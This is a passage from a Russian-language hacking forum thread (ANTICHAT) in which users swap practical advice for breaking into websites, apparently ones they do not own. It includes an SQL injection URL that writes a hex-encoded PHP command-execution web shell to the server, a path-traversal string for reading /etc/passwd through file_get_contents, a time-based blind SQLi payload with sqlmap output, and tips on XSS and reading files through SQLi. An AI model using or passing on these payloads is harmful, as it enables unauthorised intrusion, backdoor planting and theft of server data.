ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.12.2016, 17:06
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Сообщение от qqq1457
qqq1457 said:
↑
http://localhost/'||(select
count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select код шелла в hex from mysql.user into outfile '/var/www/html/UserFiles/shell.php') from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||'
в твоем примере:
http://localhost/'||(select
count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select 0x3C3F7068702073797374656D28245F4745545B22636D6422 5D293B203F3E from mysql.user into outfile '/var/www/html/UserFiles/shell.php') from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||'
если current_user file_priv=Y
попробуй Уже разобрался мои варианты не работали из-за того что там нет прав на запись((
|
|
|
29.12.2016, 02:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
760
Репутация:
0
|
|
На сайте имеется XSS. На сайте стоит бейзик авторизация ( .htpasswd )
Насколько реально получить Request > Authorization > value ?
 |
|
|
|
29.12.2016, 14:29
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от myblitz
myblitz said:
↑
На сайте имеется XSS. На сайте стоит бейзик авторизация ( .htpasswd )
Насколько реально получить Request > Authorization > value ?
не получится
|
|
|
|
29.12.2016, 20:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Код:
$html = @file_get_contents($_GET['param'] . '?q=' . $q);
echo $html;
Могу передать любой param и $q, хочу прочитать конфиг движка. Но проблема, как видим, в том что добавляется '?q=' . $q к пути, следовательно путь становится не корректным. Что можно сделать?
|
|
|
|
30.12.2016, 01:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
1639
Репутация:
0
|
|
Привет, есть blind sql inj, могу читать файлы, но факт в том, что не все, то-есть /etc/passwd, /etc/mysql/my.cnf/, /etc/hosts читаются без проблем, а вот файл index.php не хочет, и конфиги апача тоже не видит, хотя путь 100% верный, так-как есть phpinfo() файл и через него все видно.
|
|
|
|
30.12.2016, 02:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
19301
Репутация:
0
|
|
ребзя, очень срочно требуется получить полный путь на сервере, есть sql shell...
UPD: Не актуально, нашел в логах одной из табл
|
|
|
|
30.12.2016, 08:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
76692
Репутация:
138
|
|
Сообщение от weleor
weleor said:
↑
Привет, есть blind sql inj, могу читать файлы, но факт в том, что не все, то-есть /etc/passwd, /etc/mysql/my.cnf/, /etc/hosts читаются без проблем, а вот файл index.php не хочет, и конфиги апача тоже не видит, хотя путь 100% верный, так-как есть phpinfo() файл и через него все видно. Читаешь с правами мускула (или какая там СУБД).
Чмоды выставлены так, что у мускула нет прав на чтение этих файлов.
|
|
|
|
30.12.2016, 11:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
76692
Репутация:
138
|
|
Сообщение от Zmaster_
Zmaster_ said:
↑
Код:
$html = @file_get_contents($_GET['param'] . '?q=' . $q);
echo $html;
Могу передать любой param и $q, хочу прочитать конфиг движка. Но проблема, как видим, в том что добавляется '?q=' . $q к пути, следовательно путь становится не корректным. Что можно сделать? Читалка будет работать, если в $q передать по типу
Код:
Code:
/../../../../../etc/passwd
param=any
|
|
|
|
01.01.2017, 19:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
1639
Репутация:
0
|
|
Привет, sqlmap очень медленно делает дамп, (~ 1 символ за минуту). Может можно как-нибудь ускорить?
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=&password=" AND (SELECT * FROM (SELECT(SLEEP(5)))MCPI) AND "cNZX" LIKE "cNZX
[18:18:57] [ERROR] invalid character detected. retrying..
[18:24:18] [ERROR] invalid character detected. retrying..
[18:25:57] [ERROR] invalid character detected. retrying..
[18:27:36] [ERROR] invalid character detected. retrying..
[18:29:15] [ERROR] invalid character detected. retrying..
[18:30:55] [ERROR] unable to properly validate last character value ('ч')..
|
|
|
|
02.01.2017, 18:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
19301
Репутация:
0
|
|
Сообщение от weleor
weleor said:
↑
Привет, sqlmap очень медленно делает дамп, (~ 1 символ за минуту). Может можно как-нибудь ускорить?
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=&password=" AND (SELECT * FROM (SELECT(SLEEP(5)))MCPI) AND "cNZX" LIKE "cNZX
[18:18:57] [ERROR] invalid character detected. retrying..
[18:24:18] [ERROR] invalid character detected. retrying..
[18:25:57] [ERROR] invalid character detected. retrying..
[18:27:36] [ERROR] invalid character detected. retrying..
[18:29:15] [ERROR] invalid character detected. retrying..
[18:30:55] [ERROR] unable to properly validate last character value ('ч').. --thread 10
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
